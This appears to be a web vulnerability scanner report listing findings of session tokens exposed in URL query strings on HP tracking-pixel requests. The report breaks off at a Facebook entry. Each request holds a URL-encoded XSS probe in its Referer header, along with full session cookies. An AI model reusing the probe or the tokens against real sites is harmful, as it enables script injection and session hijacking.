<a href="/tutorials/viewHowTo/p/courseId/32049/HP_ProtectTools_Secu.htm?courseSessionId=175483&campusId=10163" title="Get an overview of HP ProtectTools Security Manager and learn how to set up and use Smart Card (Java Card) functionality, step by step.">HP ProtectTools Security Manager: enable Smart Card security</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/32069/HP_ProtectTools_Secu.htm?courseSessionId=175484&campusId=10163" title="Learn how to configure BIOS settings using the HP ProtectTools Security Manager.">HP ProtectTools Security Manager: using BIOS Configuration</a>
...[SNIP]...
<td align="left" valign="top" width="540">


<a href="/tutorials/viewHowTo/p/courseId/32089/HP_ProtectTools_Secu.htm?courseSessionId=175485&campusId=10163" title="Get an overview of HP ProtectTools Security Manager and learn how to set up and use SSO functionality, step by step.">HP ProtectTools Security Manager: using single sign-on</a>
...[SNIP]...

8.9. http://h30187.www3.hp.com/is/20e091670f/p/productId/104917/eventType/PDV/puid/999999b/i.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://h30187.www3.hp.com
Path:   /is/20e091670f/p/productId/104917/eventType/PDV/puid/999999b/i.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /is/20e091670f/p/productId/104917/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=e9edfe14149532620baf153715d9 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=4x4x85; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38; JSESSIONID=abcdCtm9HqrsffciqN2it; EMID=; hplcpsession.id=e9edfe14149532620baf153715d9

Response

HTTP/1.1 200 OK
cache-control: no-cache
Content-Type: image/gif
Date: Sun, 04 Sep 2011 22:44:32 GMT
expires: 0
pragma: no-cache
Server: nginx
X-Cluster-Member: hplc04.ec2.powered.com
X-Nginx-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 43
Connection: keep-alive

GIF89a.............!...
...,...........L..;

8.10. http://h30187.www3.hp.com/is/325ef8a67a/p/productId/104923/eventType/PDV/puid/999999b/i.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://h30187.www3.hp.com
Path:   /is/325ef8a67a/p/productId/104923/eventType/PDV/puid/999999b/i.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /is/325ef8a67a/p/productId/104923/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=e9edfe14149532620baf153715d9 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=4x4x85; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38; JSESSIONID=abcdCtm9HqrsffciqN2it; EMID=; hplcpsession.id=e9edfe14149532620baf153715d9

Response

HTTP/1.1 200 OK
cache-control: no-cache
Content-Type: image/gif
Date: Sun, 04 Sep 2011 22:44:32 GMT
expires: 0
pragma: no-cache
Server: nginx
X-Cluster-Member: hplc04.ec2.powered.com
X-Nginx-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 43
Connection: keep-alive

GIF89a.............!...
...,...........L..;

8.11. http://h30187.www3.hp.com/is/3acb9749b2/p/productId/104920/eventType/PDV/puid/999999b/i.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://h30187.www3.hp.com
Path:   /is/3acb9749b2/p/productId/104920/eventType/PDV/puid/999999b/i.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /is/3acb9749b2/p/productId/104920/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=e9edfe14149532620baf153715d9 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=4x4x85; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38; JSESSIONID=abcdCtm9HqrsffciqN2it; EMID=; hplcpsession.id=e9edfe14149532620baf153715d9

Response

HTTP/1.1 200 OK
cache-control: no-cache
Content-Type: image/gif
Date: Sun, 04 Sep 2011 22:44:32 GMT
expires: 0
pragma: no-cache
Server: nginx
X-Cluster-Member: hplc04.ec2.powered.com
X-Nginx-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 43
Connection: keep-alive

GIF89a.............!...
...,...........L..;

8.12. http://h30187.www3.hp.com/is/3b7457787c/p/productId/104931/eventType/PDV/puid/999999b/i.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://h30187.www3.hp.com
Path:   /is/3b7457787c/p/productId/104931/eventType/PDV/puid/999999b/i.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /is/3b7457787c/p/productId/104931/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=858a9baec6abb4b856fc31eaded4 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; EMID=; hplcpsession.id=858a9baec6abb4b856fc31eaded4; JSESSIONID=abcB5xa1dVrqYenM4t3it; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512

Response

HTTP/1.1 200 OK
cache-control: no-cache
Content-Type: image/gif
Date: Mon, 05 Sep 2011 01:59:42 GMT
expires: 0
pragma: no-cache
Server: nginx
X-Cluster-Member: hplc02.ec2.powered.com
X-Nginx-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 43
Connection: keep-alive

GIF89a.............!...
...,...........L..;

8.13. http://h30187.www3.hp.com/is/47780c0137/p/productId/104922/eventType/PDV/puid/999999b/i.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://h30187.www3.hp.com
Path:   /is/47780c0137/p/productId/104922/eventType/PDV/puid/999999b/i.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /is/47780c0137/p/productId/104922/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=e9edfe14149532620baf153715d9 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=4x4x85; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38; JSESSIONID=abcdCtm9HqrsffciqN2it; EMID=; hplcpsession.id=e9edfe14149532620baf153715d9

Response

HTTP/1.1 200 OK
cache-control: no-cache
Content-Type: image/gif
Date: Sun, 04 Sep 2011 22:44:32 GMT
expires: 0
pragma: no-cache
Server: nginx
X-Cluster-Member: hplc04.ec2.powered.com
X-Nginx-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 43
Connection: keep-alive

GIF89a.............!...
...,...........L..;

8.14. http://h30187.www3.hp.com/is/8ba8b30c42/p/productId/104918/eventType/PDV/puid/999999b/i.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://h30187.www3.hp.com
Path:   /is/8ba8b30c42/p/productId/104918/eventType/PDV/puid/999999b/i.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /is/8ba8b30c42/p/productId/104918/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=858a9baec6abb4b856fc31eaded4 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; EMID=; hplcpsession.id=858a9baec6abb4b856fc31eaded4; JSESSIONID=abcB5xa1dVrqYenM4t3it; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512

Response

HTTP/1.1 200 OK
cache-control: no-cache
Content-Type: image/gif
Date: Mon, 05 Sep 2011 01:59:50 GMT
expires: 0
pragma: no-cache
Server: nginx
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 43
Connection: keep-alive

GIF89a.............!...
...,...........L..;

8.15. http://h30187.www3.hp.com/is/9ccd9cd181/p/productId/104924/eventType/PDV/puid/999999b/i.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://h30187.www3.hp.com
Path:   /is/9ccd9cd181/p/productId/104924/eventType/PDV/puid/999999b/i.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /is/9ccd9cd181/p/productId/104924/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=e9edfe14149532620baf153715d9 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=4x4x85; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38; JSESSIONID=abcdCtm9HqrsffciqN2it; EMID=; hplcpsession.id=e9edfe14149532620baf153715d9

Response

HTTP/1.1 200 OK
cache-control: no-cache
Content-Type: image/gif
Date: Sun, 04 Sep 2011 22:44:33 GMT
expires: 0
pragma: no-cache
Server: nginx
X-Cluster-Member: hplc04.ec2.powered.com
X-Nginx-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 43
Connection: keep-alive

GIF89a.............!...
...,...........L..;

8.16. http://h30187.www3.hp.com/is/a5588e763b/p/productId/104931/eventType/PDV/puid/999999b/i.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://h30187.www3.hp.com
Path:   /is/a5588e763b/p/productId/104931/eventType/PDV/puid/999999b/i.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /is/a5588e763b/p/productId/104931/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=e9edfe14149532620baf153715d9 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=4x4x85; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38; JSESSIONID=abcdCtm9HqrsffciqN2it; EMID=; hplcpsession.id=e9edfe14149532620baf153715d9

Response

HTTP/1.1 200 OK
cache-control: no-cache
Content-Type: image/gif
Date: Sun, 04 Sep 2011 22:44:33 GMT
expires: 0
pragma: no-cache
Server: nginx
X-Cluster-Member: hplc04.ec2.powered.com
X-Nginx-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 43
Connection: keep-alive

GIF89a.............!...
...,...........L..;

8.17. http://h30187.www3.hp.com/is/a5e43ec55d/p/productId/104921/eventType/PDV/puid/999999b/i.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://h30187.www3.hp.com
Path:   /is/a5e43ec55d/p/productId/104921/eventType/PDV/puid/999999b/i.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /is/a5e43ec55d/p/productId/104921/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=858a9baec6abb4b856fc31eaded4 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; EMID=; hplcpsession.id=858a9baec6abb4b856fc31eaded4; JSESSIONID=abcB5xa1dVrqYenM4t3it; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512

Response

HTTP/1.1 200 OK
cache-control: no-cache
Content-Type: image/gif
Date: Mon, 05 Sep 2011 01:59:48 GMT
expires: 0
pragma: no-cache
Server: nginx
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 43
Connection: keep-alive

GIF89a.............!...
...,...........L..;

8.18. http://h30187.www3.hp.com/is/b5c411ac2a/p/productId/104923/eventType/PDV/puid/999999b/i.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://h30187.www3.hp.com
Path:   /is/b5c411ac2a/p/productId/104923/eventType/PDV/puid/999999b/i.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /is/b5c411ac2a/p/productId/104923/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=858a9baec6abb4b856fc31eaded4 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; EMID=; hplcpsession.id=858a9baec6abb4b856fc31eaded4; JSESSIONID=abcB5xa1dVrqYenM4t3it; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512

Response

HTTP/1.1 200 OK
cache-control: no-cache
Content-Type: image/gif
Date: Mon, 05 Sep 2011 01:59:42 GMT
expires: 0
pragma: no-cache
Server: nginx
X-Cluster-Member: hplc02.ec2.powered.com
X-Nginx-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 43
Connection: keep-alive

GIF89a.............!...
...,...........L..;

8.19. http://h30187.www3.hp.com/is/c584bdc88b/p/productId/104924/eventType/PDV/puid/999999b/i.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://h30187.www3.hp.com
Path:   /is/c584bdc88b/p/productId/104924/eventType/PDV/puid/999999b/i.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /is/c584bdc88b/p/productId/104924/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=858a9baec6abb4b856fc31eaded4 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; EMID=; hplcpsession.id=858a9baec6abb4b856fc31eaded4; JSESSIONID=abcB5xa1dVrqYenM4t3it; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512

Response

HTTP/1.1 200 OK
cache-control: no-cache
Content-Type: image/gif
Date: Mon, 05 Sep 2011 01:59:43 GMT
expires: 0
pragma: no-cache
Server: nginx
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 43
Connection: keep-alive

GIF89a.............!...
...,...........L..;

8.20. http://h30187.www3.hp.com/is/d08e5b9012/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://h30187.www3.hp.com
Path:   /is/d08e5b9012/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /is/d08e5b9012/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif?hplcpsession.id=858a9baec6abb4b856fc31eaded4 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; EMID=; hplcpsession.id=858a9baec6abb4b856fc31eaded4; JSESSIONID=abcB5xa1dVrqYenM4t3it; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512

Response

HTTP/1.1 200 OK
cache-control: no-cache
Content-Type: image/gif
Date: Mon, 05 Sep 2011 01:59:42 GMT
expires: 0
pragma: no-cache
Server: nginx
X-Cluster-Member: hplc02.ec2.powered.com
X-Nginx-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 43
Connection: keep-alive

GIF89a.............!...
...,...........L..;

8.21. http://h30187.www3.hp.com/is/ec0a3f9959/p/productId/104920/eventType/PDV/puid/999999b/i.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://h30187.www3.hp.com
Path:   /is/ec0a3f9959/p/productId/104920/eventType/PDV/puid/999999b/i.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /is/ec0a3f9959/p/productId/104920/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=858a9baec6abb4b856fc31eaded4 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; EMID=; hplcpsession.id=858a9baec6abb4b856fc31eaded4; JSESSIONID=abcB5xa1dVrqYenM4t3it; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512

Response

HTTP/1.1 200 OK
cache-control: no-cache
Content-Type: image/gif
Date: Mon, 05 Sep 2011 01:59:42 GMT
expires: 0
pragma: no-cache
Server: nginx
X-Cluster-Member: hplc02.ec2.powered.com
X-Nginx-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 43
Connection: keep-alive

GIF89a.............!...
...,...........L..;

8.22. http://h30187.www3.hp.com/is/f8069e08a0/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://h30187.www3.hp.com
Path:   /is/f8069e08a0/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /is/f8069e08a0/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif?hplcpsession.id=e9edfe14149532620baf153715d9 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=4x4x85; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38; JSESSIONID=abcdCtm9HqrsffciqN2it; EMID=; hplcpsession.id=e9edfe14149532620baf153715d9

Response

HTTP/1.1 200 OK
cache-control: no-cache
Content-Type: image/gif
Date: Sun, 04 Sep 2011 22:44:32 GMT
expires: 0
pragma: no-cache
Server: nginx
X-Cluster-Member: hplc04.ec2.powered.com
X-Nginx-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 43
Connection: keep-alive

GIF89a.............!...
...,...........L..;

8.23. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

